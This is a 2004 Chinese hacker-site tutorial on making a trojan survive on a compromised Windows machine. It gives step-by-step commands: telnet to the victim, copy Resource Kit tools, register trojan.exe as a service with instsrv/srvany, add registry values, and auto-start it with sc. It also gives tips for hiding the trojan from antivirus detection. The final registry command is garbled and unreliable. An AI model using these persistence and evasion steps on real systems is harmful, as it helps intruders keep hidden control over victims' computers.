文章导航PC6首页软件下载单机游戏安卓资源苹果资源

pc软件新闻网络操作系统办公工具编程服务器软件评测

安卓新闻资讯应用教程刷机教程安卓游戏攻略tv资讯深度阅读综合安卓评测

苹果ios资讯苹果手机越狱备份教程美化教程ios软件教程mac教程

单机游戏角色扮演即时战略动作射击棋牌游戏体育竞技模拟经营其它游戏游戏工具

网游cf活动dnf活动lol周免英雄lol礼包

手游最新动态手游评测手游活动新游预告手游问答

您的位置:首页网络冲浪黑客天空 → 让马儿注册为系统服务

让马儿注册为系统服务

时间:2004/10/8 16:38:00来源:本站整理作者:蓝点我要评论(2)

    一般木马启动的办法不外乎以下几种:
1.启动组
2.autoexe.bat
3.注册表
4.win.ini
5.sysytem.ini
6.winstat.bat
7.*.inf
8.*.autorun
那么我们如何把自己的马儿注册为系统服务,从而增强其隐蔽性呢?下面是实现办法:
我们所需的工具已经由微软提供在win2000 resouce kit工具包里,名为instsrv.exe srvany.exe reg.exe sc.exe当然还需要配置好的马儿,
就叫trojan.exe吧。我们先telnet上肉鸡,将上述工具copy到system32目录下,下面就开始行动啦,命令为instsrv.exe myservice srvany.exe。
这样就已经注册了一项系统服务,名为myservice,下面就要操作注册表,我们要在heky_local_machine\system\currentcontrolset\services找到我们刚才添加的myservice,新建一个键,名为parameters,在parameters下新建键名为application,类型为reg_sz,数据值就是c:\winnt\system32\trojan.exe. 
那么我们如何实现以上操作呢?偶提供两种办法,一现在自己机机上操作,将heky_local_machine\system\currencontrolset\services-parameters导出为srv.reg一并传到肉鸡,然后运行reg.exe /import srv.reg .这样就将KO了。另外一种就是用reg.exe手动添加。reg.exe的用法如下: 
F:\tools\nettools>reg
REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?

ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY
valueName The value name, under the selected Key, to add
/ve add the empty value name 
Type [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN |
REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN |
REG_NONE | REG_EXPAND_SZ ]
If omitted, REG_SZ is assumed
Separator Specify one charactor that you use as the separator in your data
string for REG_MULTI_SZ. If omitted, use "\0" as the separator
Data The data to assign to the registry valueName being added
/f Force overwriting the existing registry entry without prompt
每次都会返回代码0,1 0表示成功,1表示失败:(。
下面就是一个例子:REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %"systemroot"%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
Notice: Put the double quote ( " ) inside the expand string
根据这个例子不难看出,我们要添加的服务的命令应该是:REG ADD HKCC\system\currentcontrolset\parameters /v myservice /t reg_sz /d c:\winnt\system32 嘿嘿!好了马儿就变成服务了呀,下面就运行trojan.exe吧,另外你需要用sc.exe来congfig一下,将myservice配置为auto,sc.exe 大家用的多了,偶就不多废话了。
^_^加上马儿的自我保护,你的马会不会变成“不死神马”呀!注意尽量不要让木马以开头提到的8种方法启动,以免被查出trojan.exe的路径而被删除掉。

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 黑客大战直播网址 黑客

最新文章 黑客大战直播网址 黑客什么是木马,什么是木马 计算机病毒是指什么什么是木马,什么是木马病毒黑客破解密码常用的方法告诉你黑客的Google搜索技巧

人气排行 如何攻击局域网电脑无线网络密码破解教程(破解无线路由WEP加密网站获得系统权限攻击教程流光破解ftp密码教程计算机病毒是指什么黑客破解密码常用的方法如何命令行/DOS下列出进程名与进程文件路径2010黑客工具